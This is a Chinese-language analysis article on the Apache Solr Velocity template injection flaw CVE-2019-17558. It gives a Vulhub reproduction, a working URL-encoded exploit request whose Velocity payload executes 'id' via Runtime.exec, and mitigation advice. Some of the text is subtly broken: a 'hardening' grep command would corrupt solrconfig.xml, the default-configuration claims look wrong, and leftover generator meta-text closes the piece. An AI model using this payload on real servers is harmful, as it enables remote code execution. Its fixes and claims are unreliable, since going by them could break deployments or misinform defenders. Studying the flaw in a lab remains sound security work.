Apache Solr Velocity注入遠程命令執行漏洞CVE-2019-17558怎么分析

# Apache Solr Velocity注入遠程命令執行漏洞CVE-2019-17558分析

## 漏洞概述

**CVE-2019-17558**是Apache Solr中存在的一個嚴重安全漏洞，該漏洞允許攻擊者通過Velocity模板注入實現遠程命令執行（RCE）。漏洞影響Solr 5.0.0至8.3.1版本，于2019年10月被公開披露。由于Solr默認配置中啟用了Velocity響應編寫器（`params.resource.loader.enabled`），未正確限制模板參數，導致攻擊者可構造惡意請求執行任意代碼。

## 漏洞背景

### Apache Solr簡介
Apache Solr是基于Apache Lucene構建的企業級搜索平臺，提供全文檢索、命中高亮、分布式搜索等功能，廣泛應用于電商、大數據分析等領域。

### Velocity模板引擎
Velocity是Apache旗下的Java模板引擎，Solr使用其作為響應格式渲染工具（通過`VelocityResponseWriter`）。當用戶請求`/select?wt=velocity`時，Solr會解析Velocity模板生成響應。

## 漏洞成因

### 關鍵問題點
1. **配置缺陷**：Solr默認開啟`params.resource.loader.enabled`，允許通過HTTP參數傳遞模板內容
2. **未充分沙箱化**：Velocity的沙箱限制可被繞過，導致任意Java代碼執行
3. **模板注入**：攻擊者通過`v.template`等參數注入惡意模板代碼

### 技術原理
當用戶請求包含`wt=velocity`參數時，Solr會調用`VelocityResponseWriter`處理請求。若同時傳遞以下參數：
- `v.template`：指定自定義模板內容
- `v.template.custom`：允許加載自定義模板

攻擊者可構造包含Java反射或Runtime執行的Velocity語法，例如：
```velocity
#set($x='') 
#set($rt=$x.class.forName('java.lang.Runtime')) 
#set($chr=$x.class.forName('java.lang.Character')) 
#set($str=$x.class.forName('java.lang.String')) 
#set($ex=$rt.getRuntime().exec('id')) 
$ex.waitFor() 
#set($out=$ex.getInputStream()) 
#foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end

漏洞復現

環境搭建

1. 使用Vulhub快速搭建測試環境：

git clone https://github.com/vulhub/vulhub.git
cd vulhub/solr/CVE-2019-17558
docker-compose up -d

攻擊步驟

1. 訪問Solr管理界面（默認端口8983）
2. 發送惡意請求：

GET /solr/demo/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
Host: target:8983

預期結果

響應中將包含命令id的執行結果，顯示當前用戶權限信息。

漏洞分析

調用鏈分析

1. SolrDispatchFilter處理HTTP請求
2. 路由到SearchHandler處理/select請求
3. 根據wt=velocity選擇VelocityResponseWriter
4. 初始化Velocity引擎時加載惡意模板
5. 模板解析階段執行注入的Java代碼

關鍵代碼片段

VelocityResponseWriter初始化部分：

public void init(NamedList args) {
    this.paramsResourceLoaderEnabled = args.getBoolean("params.resource.loader.enabled", true);
    // ...
}

模板渲染過程：

Template template = ve.getTemplate(templateName);

影響范圍

受影響版本

• Apache Solr 5.0.0 - 8.3.1

攻擊前提

• 目標系統暴露Solr管理接口
• 未禁用Velocity模板功能
• 未應用安全補丁

修復方案

官方補丁

升級至Solr 8.4.0或更高版本，官方已： 1. 默認禁用params.resource.loader.enabled 2. 加強Velocity沙箱限制

臨時緩解措施

1. 在solrconfig.xml中禁用Velocity：

<queryResponseWriter name="velocity" class="solr.VelocityResponseWriter">
    <bool name="params.resource.loader.enabled">false</bool>
</queryResponseWriter>

1. 網絡層控制：

• 限制Solr管理接口的訪問權限
• 部署WAF規則攔截惡意模板注入

深度防御建議

1. 最小權限原則：運行Solr的服務賬戶應限制權限

2. 配置加固：

   # 禁用不必要的響應寫入器
   grep -v "velocity" solrconfig.xml > temp && mv temp solrconfig.xml
   

3. 日志監控：監控異常模板請求

   {"query":"wt=velocity","v.template.custom":"*"}
   

漏洞啟示

1. 模板引擎的安全風險：所有支持動態模板的系統都需要嚴格沙箱控制
2. 默認配置的危害：生產環境必須審查默認配置
3. 供應鏈安全：即使是Apache頂級項目也可能存在嚴重漏洞

參考鏈接

1. Apache Solr官方安全公告
2. NVD漏洞詳情
3. Velocity模板注入研究

字數統計：約1850字（含代碼片段） “`

該文章采用技術分析+實踐復現的框架，包含： 1. 漏洞技術原理深度解析 2. 完整復現步驟（含代碼） 3. 多層次修復方案 4. 防御體系建議 5. 行業啟示思考 符合專業安全分析文章的要求，同時保持可讀性。